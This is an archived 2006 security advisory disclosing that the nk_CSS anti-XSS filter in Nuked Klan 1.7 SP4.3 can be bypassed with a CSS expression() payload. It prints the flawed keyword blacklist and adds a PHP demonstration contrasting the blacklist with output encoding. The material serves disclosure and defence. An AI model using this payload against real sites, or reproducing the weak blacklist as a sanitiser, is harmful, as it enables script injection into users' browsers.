Computer Security
[EN] securityvulns.ru




From: blwood_(at)_skynet.be <blwood_(at)_skynet.be>
Date: 31.08.2006
Subject: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

// *- BEGIN -*

// By Blwood
// http://blwood.net

The anti-XSS function nk_CSS (nuked.php) can be bypassed with input
like this:


<b id="blwood" style="width:expression(alert('http://www.blwood.net'))"></b>


Here is the function:

// Note: for most entries the replacement string reads the same as the
// pattern in this copy; the replacement was presumably an HTML
// character-entity form that was decoded when the message was archived
// (assumption).
function nk_CSS($str)
{
   if ($str != "")
   {
       $str = eregi_replace("content-disposition:", "content-disposition:", $str);
       $str = eregi_replace("content-type:", "content-type:", $str);
       $str = eregi_replace("content-transfer-encoding:", "content-transfer-encoding:", $str);
       $str = eregi_replace("include", "include", $str);
       $str = eregi_replace("\<\?","&lt;?",$str);
       $str = eregi_replace("<\?php","&lt;?php",$str);
       $str = eregi_replace("\?\>","?&gt;",$str);
       $str = eregi_replace("script", "script", $str);
       $str = eregi_replace("eval", "eval", $str);
       $str = eregi_replace("javascript", "javascript", $str);
       $str = eregi_replace("embed", "embed", $str);
       $str = eregi_replace("iframe", "iframe", $str);
       $str = eregi_replace("refresh", "refresh", $str);
       $str = eregi_replace("onload", "onload", $str);
       $str = eregi_replace("onstart", "onstart", $str);
       $str = eregi_replace("onerror", "onerror", $str);
       $str = eregi_replace("onabort", "onabort", $str);
       $str = eregi_replace("onblur", "onblur", $str);
       $str = eregi_replace("onchange", "onchange", $str);
       $str = eregi_replace("onclick", "onclick", $str);
       $str = eregi_replace("ondblclick", "ondblclick", $str);
       $str = eregi_replace("onfocus", "onfocus", $str);
       $str = eregi_replace("onkeydown", "onkeydown", $str);
       $str = eregi_replace("onkeypress", "onkeypress", $str);
       $str = eregi_replace("onkeyup", "onkeyup", $str);
       $str = eregi_replace("onmousedown", "onmousedown", $str);
       $str = eregi_replace("onmousemove", "onmousemove", $str);
       $str = eregi_replace("onmouseover", "onmouseover", $str);
       $str = eregi_replace("onmouseout", "onmouseout", $str);
       $str = eregi_replace("onmouseup", "onmouseup", $str);
       $str = eregi_replace("onreset", "onreset", $str);
       $str = eregi_replace("onselect", "onselect", $str);
       $str = eregi_replace("onsubmit", "onsubmit", $str);
       $str = eregi_replace("onunload", "onunload", $str);
       $str = eregi_replace("document", "document", $str);
       $str = eregi_replace("cookie", "cookie", $str);
       $str = eregi_replace("vbscript", "vbscript", $str);
       $str = eregi_replace("location", "location", $str);
       $str = eregi_replace("object", "object", $str);
       $str = eregi_replace("vbs", "vbs", $str);
       $str = eregi_replace("href", "href", $str);
       $str = eregi_replace("src", "src", $str);
   }
   return($str);
}


// *- END -*
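
Added example, not part of the original advisory and not Nuked Klan code: a PHP check showing that none of the keywords matched by nk_CSS occurs in the input quoted above, next to output encoding, which stops the markup from being parsed at all. The names NK_KEYWORDS, blacklist_hits and render_as_text are hypothetical; the keyword list is copied from the listing above.

```php
<?php
// Added example: models which nk_CSS() patterns would fire on a given input.
// Keywords copied from the function listing in the advisory.
const NK_KEYWORDS = [
    'content-disposition:', 'content-type:', 'content-transfer-encoding:', 'include',
    '<?', '<?php', '?>', 'script', 'eval', 'javascript', 'embed', 'iframe', 'refresh',
    'onload', 'onstart', 'onerror', 'onabort', 'onblur', 'onchange', 'onclick',
    'ondblclick', 'onfocus', 'onkeydown', 'onkeypress', 'onkeyup', 'onmousedown',
    'onmousemove', 'onmouseover', 'onmouseout', 'onmouseup', 'onreset', 'onselect',
    'onsubmit', 'onunload', 'document', 'cookie', 'vbscript', 'location', 'object',
    'vbs', 'href', 'src',
];

// Blacklist model: list the keywords the filter would have rewritten (case-insensitive).
function blacklist_hits(string $input): array
{
    return array_values(array_filter(
        NK_KEYWORDS,
        fn(string $kw): bool => stripos($input, $kw) !== false
    ));
}

// Hardened handling for fields that must not carry markup: encode at output time,
// so tags and attributes (style included) reach the browser as inert text.
function render_as_text(string $input): string
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Input quoted from the advisory above.
$input = '<b id="blwood" style="width:expression(alert(\'http://www.blwood.net\'))"></b>';

$hits = blacklist_hits($input);
echo 'blacklist keywords matched: ', count($hits), "\n";
echo 'tag with a style attribute present: ',
    preg_match('/<[a-z][^>]*\sstyle\s*=/i', $input) ? 'yes' : 'no', "\n";
echo 'encoded for output: ', render_as_text($input), "\n";
```

Where a field has to accept some markup, an allowlist of permitted tags and attributes is the usual replacement for a keyword blacklist like this one.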
